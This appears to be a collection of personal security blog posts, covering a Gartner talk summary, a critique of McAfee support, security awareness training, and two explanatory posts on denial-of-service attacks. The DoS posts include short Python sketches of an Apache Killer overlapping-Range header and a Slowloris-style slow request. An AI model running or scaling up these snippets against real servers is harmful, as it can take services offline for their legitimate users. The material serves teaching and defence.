Gartner Security and Risk Management conference – Continuous Application Security Monitoring

This was a talk from Whitehat Security covering the increasing need for continuous application security monitoring and how this should be integrated with the SDLC;

– Attacks becoming targeted at specific companies / industries

– Risk of severe brand damage

– Security risks becoming key concern at board level

Effective web application security programs must comprise;

  • Continuous, concurrent assessments
    • Continuous process – restart on completion of assessment, automatic, no need for manual intervention
    • Assess multiple applications / code bases concurrently, not serially – minimises vulnerability window
  • Manage security posture
    • Ongoing metrics and measurement
    • Real-time risk modelling
      • Understand exposure to high-value business applications
      • Accurate prioritisation
      • Analytics and trend reporting
      • Benchmark with industry peers
      • Dashboards and in-depth vulnerability reports
  • Implement across SDLC
    • From requirements and design through development to deployment and production monitoring
      • Production assessments (immediate response)
      • Pre-production (reduce cost)
      • Source code analysis (faster remediation)

The talk was very brief and didn’t go into any real detail about what you should do, when to do it, or how the SDLC might actually look; the process of find issues – verify – plan – resolve – test wasn’t covered.  The basic points that were covered do make sense, but I’d have liked the full session to be used and a lot more detail covered.

I completely agree, however, that continuous monitoring of application and code security should be high on the security agenda – remember, the vast majority of vulnerabilities and successful attacks are against applications.  Secure development should be a key foundation of any business’s SDLC.

K

Updates and what’s coming up..

As mentioned in my McAfee post, I’d meant to produce a quick update post covering recent goings-on and what’s coming up, as my blog updates have been a little erratic over the last few months..

Life has been pretty busy; on top of work, getting married and a couple of honeymoons, I now officially have my Masters in ‘Distributed Systems and Networks’!  This has been a long while coming, as I have been working on my part-time MSc for the last 2.5-3 years outside of office hours.  Getting a ‘commended’ result was very pleasing as I expected just a standard ‘pass’.  OK, so it’s not a distinction, but still good.

This has also meant my work with the Cloud Security Alliance has slid somewhat this year due to a lack of time.  I’m hoping to get more involved with that again now that things will hopefully be slowing down slightly – well, apart from the impending house move of course!

Regarding work, I’m still getting to work on some very interesting projects and great technologies, some of which I’ll be writing about in upcoming posts.

Talking of upcoming posts, I am at the Gartner Security and Risk Management conference this week, and the Information Security Forum world annual congress in November, both of which should provide some interesting material to share.  I’ll likely try to follow a similar approach to previous conferences and mainly ‘live-blog’ from the talks as they happen.

K

Data breaches visualisation

Came across this recently and think it’s a pretty decent demonstration of the continuing frequency and severity of data breaches;

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

You can hover over any of the circles then click for more information about that breach.

This also shows how companies never seem to learn; we are still seeing breaches of a very similar nature to those we were seeing several years ago.

It’s time to learn from our mistakes and actually design and build secure systems, not just tick compliance boxes!  This is definitely one of my personal bug-bears. As an example, many companies that must maintain PCI compliance care about this for obvious reasons, but too often projects and system owners care only about compliance and not about actually being secure or making systems and ‘non-PCI’ data secure.  This is despite the payment card industry being very clear that PCI-DSS is the bare minimum standard you must achieve to be permitted to handle card transactions, not the standard you should aim for to be a secure business and keep your customers’ data secure.

It’s time to get better at communicating the risks to the business and working to ensure secure design and implementation are at the forefront of any solution.

K

An ode to McAfee.. Purveyors of the finest scamware

So I was getting ready to post about various things that have been keeping me busy recently and some upcoming plans, but a recent interaction with McAfee prompted me to write about their excellent service first..

Last week my father-in-law’s computer became infected with a trojan.  Not the biggest issue, you’d think, and a fairly common occurrence.  However, he was running fully up-to-date McAfee protection that he actually pays the princely sum of about £55 per year for.

This is failure one: a pensioner who only uses the internet for running a motorcycle club, booking holidays and general browsing becomes infected with a trojan despite having fully up-to-date, paid-for anti-malware installed.

Then we go through the process of this exceptional anti-malware software trying to remove the trojan, which goes something like this;

– McAfee needs to reboot your computer to remove the malware

– Reboot

– McAfee needs to reboot your computer to remove the malware

.. and so on

This is failure two.

The next is perhaps the worst failure of all. As a paying customer, my father-in-law then decided to contact McAfee customer support.  After a long-winded conversation with someone who could barely understand him, he was finally put through to technical support.  At last, someone who could help.  Well, they did understand the problem and were able to tell him that the software he subscribes to from them had likely been disabled by the trojan, and that his firewall was also likely turned off.  Their next statement was that they would require a further £56 in order to provide any assistance.

So – pay a yearly subscription for McAfee anti-malware, it doesn’t work..  Then when you call them for assistance, they want more money to help resolve the issue caused by their solution not working!

When asked point blank what the subscription fee gets you over and above using a free anti-malware solution, the response was ‘well, erm, nothing sir’.

So my advice to you, and to anyone you know who may ask your advice on which anti-malware solution to use, is;

– Don’t use McAfee

– Don’t pay for it if you are comfortable using one of the many excellent free products such as AVG free

– If you do pay for it, make sure you have a clear understanding of just what your investment will get you

– Oh and don’t use McAfee.

I have no idea if the other paid-for solutions offer a service this bad, but it seems to put them on a par with the scamware-type vendors – ‘here, install this; when it doesn’t work, pay us more to help’.  The only difference is McAfee put a legal and friendly face on their scam, which probably makes them worse.

And to top it off, guess who is probably going to have to go and clean the infected machine now..

Apologies for the slightly ranty post, but this was massively poor on McAfee’s part.

A more balanced post about general IT stuff, my Masters and some upcoming plans will follow shortly 🙂

K

Security Awareness Training – Worthwhile?

One of the topics that I sometimes think about is the value of security awareness training.

This tends to be a topic that many people in the security industry seem fairly passionate about, either for or against the value of it.
Vendors of software / programs such as Wombat, PhishMe, SANS etc. are all very pro user awareness training and regular programs to raise security awareness.
Conversely, companies that sell products and not training are likely to strongly advise that security budget is spent on tools rather than awareness training. To reinforce this point, at RSA Europe last year I actually asked a couple of senior RSA guys about the value of awareness training when they did a presentation around improving security and where to spend, and was told somewhat strongly that awareness training was basically a waste of time.

So the question is who is right, or do both sides have a fair point?

On the for side – how can users be expected to act securely, and know how to act securely, without some training? People need to learn and understand how to spot phishing emails, why it is bad to send anything non-public externally without it being encrypted, why strong and unique passwords should be used, how to spot social engineering, etc. Security awareness training and campaigns can serve a dual purpose –
– Ensure users learn more about security for both their work and home IT / online lives
– Raise general awareness – a continual program of advice and varied messages keeps general security and secure methods of working on people’s minds – this should not be a once-a-year process.
Any increase in security awareness and reduction in the attack surface that is the human user must be a good thing, right?

On the against side – what is the most effective way to spend a limited security budget? Does spending budget on training offer the same improvement in overall security as, say, adding a further layer to the defence-in-depth strategy or hiring extra dedicated IT security personnel? Even with training, a significant number of users will still click the link in a phishing email or give out details they shouldn’t to a social engineer, so you still need all the other defences, both technical and personnel, even if an extensive security awareness program is undertaken.
– Users will always be a large security risk, so it’s best to treat them and their actions as untrusted and create a security posture accordingly.

So which side is right? I think to a large extent they both are. Depending on which report you read, something like 60-80% of all APT (Advanced Persistent Threat) attacks are initiated via social engineering – e.g. getting a user to do something for the attacker. So the most insidious attacks – those that are very difficult to detect and are currently being used by the security industry as the driver for selling new security tools – tend to start with the user. Surely, then, reducing the chances someone will succumb to social engineering must be a good thing? Yes, you’ll never get to 100%, but then no actual security device ever detects or prevents 100% of attacks. So why do security tool vendors not like awareness training? Likely money and profits.

A balanced approach is key: understand the environment and threat landscape your company operates in and create a holistic security program encompassing the necessary tools, skilled security personnel and user awareness training.

So, how can awareness training be made as effective as possible? Along with varied and continuous messages and taking the time to make security part of the culture, the key thing is to get the message to people and make them want to take it on board. I think there are two components to making this successful;
– Fear – not with lies or exaggeration, but highlight real stories, especially stories that people will relate to, so think PlayStation and bank / online shopping hacks.
– Make it relevant – link the secure ways of working to people’s home lives, so highlight how they can be secure online, not fall for scams, use social sites as safely as possible, shop safely, etc.

To conclude, my opinion is that security awareness training does add real value and should be part of any security program. It does not, however, in any way replace the need for a strong defence-in-depth strategy aligned to your business and threat landscape. What do you think?

K

Denial of Service attacks part 2

My previous post on this topic covered the basics of DDoS in terms of what it is and the most commonly thought-of attack type.
This post will cover some of the more interesting DDoS attacks that don’t rely on the brute-force approach of massive traffic volume to bring down a service; attacks of that kind are also known as volumetric attacks.

The two categories of DDoS that will be covered in this post are known as RFC / Compliance Attacks and Compute Intensive Attacks.

RFC / Compliance Attacks

These typically work against vulnerabilities in either network protocols or web servers. Some examples of this form of attack are;
– Ping of Death; attacks an ICMP vulnerability
– Teardrop; works against TCP/IP fragmentation vulnerabilities in many implementations of the protocol suite
– Land; spoofs the source address to send SYN packets to the host from its own IP address
– Apache Killer; HTTP based attack against the Apache web server
– HashDoS (hash collision); attack that creates hashing collisions to DDoS various web and application servers

All of the above attacks exploit vulnerabilities in networking or application implementations and do not require a huge volume of traffic to potentially bring down a service.

As more detailed examples;
– Apache Killer; this relies on the fact that the byte range filter in some versions of the Apache web server allowed attackers to cause a DoS of the server by sending it a header that covers multiple overlapping ranges (a rough sketch of what such a crafted header might look like follows below).
– Hash DoS; this involves exploiting hash collisions to exhaust CPU resources, and is caused by the ability to force a large number of collisions via a single, multi-parameter request.
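
To make the Apache Killer example a little more concrete, here is a minimal, purely illustrative Python sketch of roughly what such a crafted request could look like. The host name and number of ranges are placeholder assumptions rather than details from any specific proof-of-concept, and the snippet only builds and prints the request string; it doesn’t send anything.

# Illustrative only: roughly the shape of an 'Apache Killer' style request.
# Vulnerable Apache versions expanded every overlapping byte range in memory,
# so a single small request carrying hundreds of ranges could exhaust server
# RAM / CPU. Placeholder host and range count; this just builds the string.
overlapping_ranges = ",".join(f"5-{i}" for i in range(1, 1300))
request = (
    "HEAD / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    f"Range: bytes=0-,{overlapping_ranges}\r\n"
    "Connection: close\r\n"
    "\r\n"
)
print(request[:120])          # the first part of the crafted header
print(len(request), "bytes")  # a tiny request with a large server-side cost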

Compute Intensive Attacks

These are attacks that typically exploit weaknesses in application workflows / processes that allow certain interactions to use huge amounts of server resource or take inordinate amounts of time. Some examples of these are;
– HOIC; attacks by sending very slow GETs and slow POSTs
– Darkshell; sends SYNs and attacks HTTP idle timeout connections
– Simple Slowloris; sends incomplete headers
– RUDY; slow POSTs and long form-field submissions
– Tor Hammer; sends very slow POSTs

These work by sending multiple slow or incomplete requests in parallel; this can quickly exhaust the web or application server’s ability to service new requests without requiring a huge amount of bandwidth or resource from the attacker.
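
As a rough, single-connection illustration of this mechanic (a sketch only, not a working attack tool), the Python snippet below opens one connection, sends an incomplete set of headers, and then trickles out an extra header line every few seconds so the request never completes. The host name and timings are made-up placeholders; only try anything like this against a test server you own.

import socket
import time

# Sketch of the 'incomplete request' mechanic behind Slowloris-style attacks.
# A real attack holds hundreds of connections like this open in parallel, each
# one tying up a worker / connection slot on the server.
TARGET = ("test-server.example.local", 80)   # placeholder: a server you own

sock = socket.create_connection(TARGET, timeout=10)
# Send the request line and one header, but never the blank line that ends the headers.
sock.sendall(b"GET / HTTP/1.1\r\nHost: test-server.example.local\r\n")

for i in range(5):    # a real tool would keep this up for far longer
    time.sleep(10)    # wait, then send another partial header so the
                      # connection still looks 'alive' to the server
    sock.sendall(f"X-Padding-{i}: keep-alive\r\n".encode())

sock.close()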

How have these evolved over the last few years?
– It initially started with attacks like the original Slowloris, which sends a very slow GET request where the header is sent so slowly that it almost never actually completes. This has been very effective against the Apache web server
– Then there was the slow POST; as with the slow GET, this is a POST that is sent so slowly it almost never completes. This one is also effective against various flavours of IIS
– The most recent addition is the slow read, where a large object is requested, then downloaded extremely slowly

These all enable the attacker to use up very many connections on the web or application server without needing large bandwidth at their disposal.

These types of attacks have been further tuned to target specific applications and databases, using similar techniques to make ‘legal’ requests of the system that lead to large resource requirements on the server. These can be targeted and fine-tuned to cause maximum damage.

These types of attack are much more insidious than the volumetric attacks covered in the previous post as they need less resource at the attacker end, so can be easier to launch. In addition, the compute intensive attacks make use of allowable, normal application behaviour that is manipulated to cause a DoS condition. As such, these attacks can be much harder to detect and block; at what point should a request that may simply be arriving over a slow connection be identified as an attack?

This is where you have to start looking at advanced application-layer defences that are tuned and configured specifically for the applications they are defending. This is another relatively large topic that I’ll likely cover in a later post, as we have now covered the three usually identified categories of DDoS attack.

K

Denial of Service Attacks part 1

Denial of Service (DoS) attacks and Distributed Denial of Service (DDoS) attacks have the same purpose: to make the service in question unavailable to those trying to make use of it.

The type of attack most commonly associated with DoS / DDoS is that of bandwidth or resource exhaustion.  These are attacks where a malicious user or group sends a large enough volume of traffic to the service, usually a web site, such that it becomes unavailable to legitimate users.  These attacks are based on simple maths: if a web service has the capacity to serve 2Gb per second and an attacker can consistently send greater than 2Gb per second, then they can likely make the service unavailable to legitimate users (anti-DoS measures notwithstanding).  The same applies to server resources: if an attacker can send enough requests to overload the servers hosting a service, they can make the service unavailable to legitimate users.

At its simplest, this type of attack originates from a collection of machines, likely a bot-net, all sending requests to a web service until the bandwidth that service has available is exhausted.

This type of attack has historically been very successful in taking down web sites / services for periods of time.  It is, however, an attack with well-defined methods of defence, and many vendors offer services to protect against it.  These usually take the form of high-bandwidth ‘cleaning centres’ or ‘scrubbing centres’ that monitor traffic going through them to their customers.  These employ various traffic analysis techniques and can block / clean very large volumes of traffic while still sending legitimate traffic on to the service that is under attack.

This type of attack is made considerably worse by the ability to amplify the attack such that a relatively small volume of source traffic can become a huge volume of traffic hitting the victim systems.  Examples of these amplification attacks are ‘Smurf’ and ‘DNS amplification’.  These attacks have received considerable press recently due to their successful and high-impact use in incidents such as the Spamhaus attack;

http://www.theregister.co.uk/2013/03/27/spamhaus_ddos_megaflood/

This was billed as the ‘biggest DDoS attack in history’.

A good overview of DNS amplification attacks can be found here;

http://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack
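
To give a feel for why amplification matters, here is a rough back-of-the-envelope sketch. The query and response sizes are illustrative assumptions rather than measurements from the Spamhaus attack, but they show why the attacker only needs a small fraction of the bandwidth that ultimately hits the victim.

# Rough, illustrative numbers only: a small spoofed DNS query can elicit a
# multi-kilobyte response (e.g. an ANY query against a zone with large records),
# giving an amplification factor of several tens of times.
query_bytes = 64           # assumed size of the spoofed query
response_bytes = 3000      # assumed size of the reflected response
amplification = response_bytes / query_bytes

target_gbps = 100          # traffic volume the attacker wants to land on the victim
attacker_gbps = target_gbps / amplification

print(f"Amplification factor: ~{amplification:.0f}x")
print(f"To land ~{target_gbps} Gbps on the victim, the attacker only needs "
      f"to source ~{attacker_gbps:.1f} Gbps of spoofed queries")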

The success of these attacks highlights the need to ensure that all internet-connected routers and DNS servers are correctly and securely configured.  Most (possibly all) of the amplification attacks rely on source address spoofing – they spoof the IP address of the victim systems as the source of the initial request so that the amplified replies go to this address, not the attacker’s.  I find it a shame that these types of attacks, which rely on source address spoofing, could largely be eliminated if devices were configured according to RFC 2267, published in 1998!

http://www.ietf.org/rfc/rfc2267.txt
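
As a toy illustration of what RFC 2267 style ingress filtering amounts to, here is a small Python sketch of the logic rather than real router configuration; the prefix and addresses are made-up documentation ranges. The provider edge knows which prefix it assigned to the downstream network and simply refuses to forward packets claiming any other source address, which is exactly what breaks spoofed-source amplification attacks.

import ipaddress

# Toy model of RFC 2267 style ingress filtering at a provider edge.
# The prefix below is a made-up documentation range assigned to the customer.
CUSTOMER_PREFIX = ipaddress.ip_network("203.0.113.0/24")

def should_forward(source_ip: str) -> bool:
    """Forward only packets whose source address belongs to the customer prefix."""
    return ipaddress.ip_address(source_ip) in CUSTOMER_PREFIX

print(should_forward("203.0.113.42"))   # True  - legitimate customer traffic
print(should_forward("198.51.100.10"))  # False - spoofed source (e.g. a DDoS
                                        # victim's address), dropped at the edge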

However, while these attacks are both common and insidious, they are the simplest form of DoS/DDoS attack.  They are also the simplest to defend against for all but the most massive attacks.

So that briefly covers the most commonly thought-of Denial of Service attacks.  The next post will go into more detail around the (to me, anyway) much more interesting DoS attacks that work by exploiting issues in TCP/IP stacks, web server functionality, etc.

K